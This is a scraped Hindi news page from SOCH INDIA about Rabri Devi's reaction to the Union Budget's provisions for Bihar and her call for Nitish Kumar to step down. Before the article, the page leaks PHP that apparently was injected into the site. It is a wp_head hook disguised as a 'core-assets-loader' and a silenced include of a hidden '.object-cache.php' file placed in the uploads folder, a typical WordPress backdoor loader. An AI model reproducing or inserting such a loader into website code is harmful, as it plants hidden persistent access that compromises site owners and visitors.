add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बिहार के लिए बजट में एलान के बाद राबड़ी देवी बोलीं, ‘…अब तो नीतीश कुमार को हट जाना चाहिए’ – SOCH INDIA
Menu

देश
बिहार के लिए बजट में एलान के बाद राबड़ी देवी बोलीं, ‘…अब तो नीतीश कुमार को हट जाना चाहिए’

nobanner

मोदी सरकार के तीसरे कार्यकाल के पहले बजट में बिहार के लिए कई एलान किए गए हैं. इसको लेकर अब बिहार की पूर्व मुख्यमंत्री और आरजेडी नेता राबड़ी देवी की पहली प्रतिक्रिया सामने आई है. बिहार के लिए किए गए बजट में एलान पर नाराजगी जताते हुए राबड़ी देवी ने कहा कहा, “जो बिहार को मिला है उससे कोई विकास नहीं होगा झुनझुना है.”

इतना ही नहीं, राबड़ी देवी ने यह भी कहा, “सीएम नीतीश कुमार ने केंद्र से जो भी मांगा था, वह उन्हें मिला नहीं. ऐसे में नीतिश कमार को अब हट जाना चाहिए.”

बिहार के लिए बजट में क्या हुए ऐलान?
बिहार में बाढ़ पर अंकुश लगाने के लिए बजट में 11,500 करोड़ रुपये के पैकेज का ऐलान किया गया है. वित्त मंत्री निर्मला सीतारमण ने अपने बजट भाषण में कहा, “अमृतसर-कोलकाता औद्योगिक गलियारे पर हम बिहार के गया में एक औद्योगिक नोड के विकास का समर्थन करेंगे. यह पूर्वी क्षेत्र के विकास को उत्प्रेरित करेगा. हम सड़क कनेक्टिविटी परियोजनाओं के विकास का भी समर्थन करेंगे-पटना-पूर्णिया एक्सप्रेसवे, बक्सर-भागलपुर राजमार्ग, बोधगया-राजगीर-वैशाली-दरभंगा और 26,000 करोड़ रुपये में बक्सर में गंगा नदी पर एक अतिरिक्त दो-लेन पुल.”